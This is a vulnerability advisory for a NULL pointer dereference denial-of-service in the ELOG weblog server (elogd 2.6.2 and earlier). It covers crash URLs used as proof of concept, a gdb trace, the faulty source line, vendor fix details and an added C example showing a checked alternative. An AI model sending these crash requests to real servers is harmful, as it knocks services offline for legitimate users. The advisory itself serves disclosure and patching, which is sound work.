ELOG Web Logbook Remote Denial of Service Vulnerability

OS2A ID: OS2A_1008

Status:
10/31/2006  Issue Discovered
11/08/2006  Reported to the Vendor
11/08/2006  Fixed by Vendor
11/10/2006  Advisory Released

Class: Denial of Service
Severity: Medium

Overview:
---------
The Electronic Logbook (ELOG) is part of a family of applications known as
weblogs. ELOG is a remarkable implementation of a weblog in its simplicity of
use and versatility.

http://midas.psi.ch/elog/index.html

Description:
------------
Remote exploitation of a denial of service vulnerability in ELOG's elogd
server allows attackers to crash the service, thereby preventing legitimate
access.

The [global] section in the configuration file elogd.cfg is used for settings
common to all logbooks. The vulnerability is due to improper handling of an
HTTP GET request if the logbook name 'global' (or any logbook name prefixed
with 'global') is used in the request. When such a request is received, a NULL
pointer dereference occurs, leading to a crash of the service.

If the application is configured with a password, only authenticated users can
exploit this vulnerability.

Impact:
-------
Successful exploitation allows a remote attacker to crash the elogd server.

Affected Software(s):
---------------------
ELOG 2.6.2 (SVN revision 1748) and prior.
Debian package elog 2.6.2+r1719-1 and prior are also vulnerable.

Proof of Concept:
-----------------
The HTTP GET request given below is sufficient to crash an affected server:

http://www.example.com/global/

or

Create a logbook [global_xxx] or [global xxx] in elogd.cfg and try to access
it using a browser:

http://www.example.com/global_xxx/
http://www.example.com/global%20xxx/

Analysis:
---------
#gdb ./elogd
...
...
(gdb) break show_elog_list
Breakpoint 2 at 0x809d6e0
(gdb) c
Continuing.
(no debugging symbols found)
elogd 2.6.2 built Nov 8 2006, 01:25:48 revision 1699
Falling back to default group "elog"
Falling back to default user "elog"
Indexing logbooks ... done
Server listening on port 8080 ...

Breakpoint 2, 0x0809d6e0 in show_elog_list ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0809eb7a in show_elog_list ()
(gdb) bt
#0  0x0809eb7a in show_elog_list ()
#1  0x00000000 in ?? ()
(gdb) i r
eax            0x0              0
ecx            0x9d43d88        164904328
edx            0x0              0
ebx            0x0              0
esp            0xbfa8aca0       0xbfa8aca0
ebp            0x80df40c        0x80df40c
esi            0xbfb27050       -1078824880
edi            0x0              0
eip            0x809eb7a        0x809eb7a
eflags         0x200246         2097734
cs             0x73             115
ss             0x7b             123
ds             0x7b             123
es             0x7b             123
fs             0x0              0
gs             0x33             51
(gdb) x/i $eip
0x809eb7a :     mov    (%eax),%eax

The vulnerable code is at line 16774 of elogd.c,

    n_msg = *lbs->n_el_index;

where the pointer lbs is dereferenced before being NULL checked. The faulting
instruction at eip, mov (%eax),%eax with eax == 0, is that dereference of the
NULL lbs pointer.

--- elogd.c, show_elog_list() -----
   } else {
      n_logbook = 1;
      n_msg = *lbs->n_el_index;
   }

   msg_list = xmalloc(sizeof(MSG_LIST) * n_msg);
--- elogd.c, show_elog_list() -----

CVSS Score Report:
------------------
ACCESS_VECTOR          = REMOTE
ACCESS_COMPLEXITY      = LOW
AUTHENTICATION         = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT       = NONE
AVAILABILITY_IMPACT    = COMPLETE
IMPACT_BIAS            = AVAILABILITY
EXPLOITABILITY         = FUNCTIONAL
REMEDIATION_LEVEL      = OFFICIAL_FIX
REPORT_CONFIDENCE      = CONFIRMED

CVSS Base Score     = 5.0 (AV:R/AC:L/Au:NR/C:N/I:N/A:C/B:A)
CVSS Temporal Score = 4.1
Risk factor         = Medium

Vendor Response:
----------------
The vendor has acknowledged the vulnerability and released a fixed version,
ELOG version 2.6.2-7 (SVN revision 1749).

http://savannah.psi.ch/websvn/log.php?repname=elog&path=%2Ftrunk%2F&rev=0&sc=0&isdir=1
(Revisions 1746-1749)

Debian has fixed this issue in elog_2.6.2+r1754-1:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397875

Solution:
---------
Install the fixed version, ELOG version 2.6.2-7 (SVN revision 1749) or later.

http://midas.psi.ch/elog/download.html

For Debian, update to elog_2.6.2+r1754-1 or later.

Credits:
--------
Jayesh KS and Arun Kethipelly of OS2A have been credited with the discovery
and analysis of this vulnerability.
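The NULL pointer dereference from the Analysis section, shown beside a checked form, as an added example that is not elogd's own code. It assumes a cut-down LOGBOOK struct carrying only the n_el_index pointer, a hypothetical find_logbook() lookup that returns NULL for any name beginning with "global" (modelling the advisory's description of the [global] section not being a real logbook), and a hypothetical handle_list_request() wrapper that turns a failed lookup into an HTTP error instead of a crash. The logbook table and request names are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Assumption: a cut-down stand-in for elogd's per-logbook structure. The real
 * LOGBOOK in elogd.c has many more fields; only n_el_index, the pointer that
 * show_elog_list() dereferences, is modelled here. */
typedef struct {
    const char *name;
    int *n_el_index;   /* number of entries in the logbook's index */
} LOGBOOK;

/* Constructed logbook table for the example: one real logbook, "demo". */
static int demo_index_count = 3;
static LOGBOOK demo_logbooks[] = {
    { "demo", &demo_index_count },
};
#define N_DEMO_LOGBOOKS (sizeof demo_logbooks / sizeof demo_logbooks[0])

/* Hypothetical lookup: maps the logbook name taken from the request path to a
 * LOGBOOK. Names starting with "global" belong to the [global] configuration
 * section, not to any logbook, so the lookup yields NULL for them, as the
 * advisory describes for /global/, /global_xxx/ and /global%20xxx/. */
static LOGBOOK *find_logbook(const char *name)
{
    if (strncmp(name, "global", 6) == 0)
        return NULL;
    for (size_t i = 0; i < N_DEMO_LOGBOOKS; i++)
        if (strcmp(demo_logbooks[i].name, name) == 0)
            return &demo_logbooks[i];
    return NULL;
}

/* Vulnerable pattern from show_elog_list(): lbs is dereferenced before any
 * NULL check. With lbs == NULL this is the mov (%eax),%eax with eax == 0 seen
 * in the gdb session. Only ever call it with a successful lookup result. */
static int n_msg_unchecked(LOGBOOK *lbs)
{
    return *lbs->n_el_index;
}

/* Hardened form: validate the pointer first and report failure to the caller
 * with -1 instead of faulting inside the daemon. */
static int n_msg_checked(LOGBOOK *lbs)
{
    if (lbs == NULL || lbs->n_el_index == NULL)
        return -1;
    return *lbs->n_el_index;
}

/* Hypothetical request handler: resolves the logbook, counts its messages and
 * returns the HTTP status to send. Stores the count in *n_msg_out (0 on error). */
static int handle_list_request(const char *logbook_name, int *n_msg_out)
{
    LOGBOOK *lbs = find_logbook(logbook_name);
    int n = n_msg_checked(lbs);
    if (n < 0) {
        *n_msg_out = 0;
        return 404;   /* unknown or reserved name: refuse the request, stay up */
    }
    *n_msg_out = n;
    return 200;
}

int main(void)
{
    /* Constructed request names: one valid logbook and the three shapes the
     * advisory's proof of concept uses. */
    const char *names[] = { "demo", "global", "global_xxx", "global xxx" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        int n = 0;
        int status = handle_list_request(names[i], &n);
        printf("/%s/ -> HTTP %d, n_msg=%d\n", names[i], status, n);
    }
    return 0;
}
```

The point of the checked form is that the lookup's failure is a normal outcome for user-controlled input, so it has to be handled on the request path, not assumed away; a single unchecked dereference in a long-running single-process daemon turns one bad URL into an outage for every user.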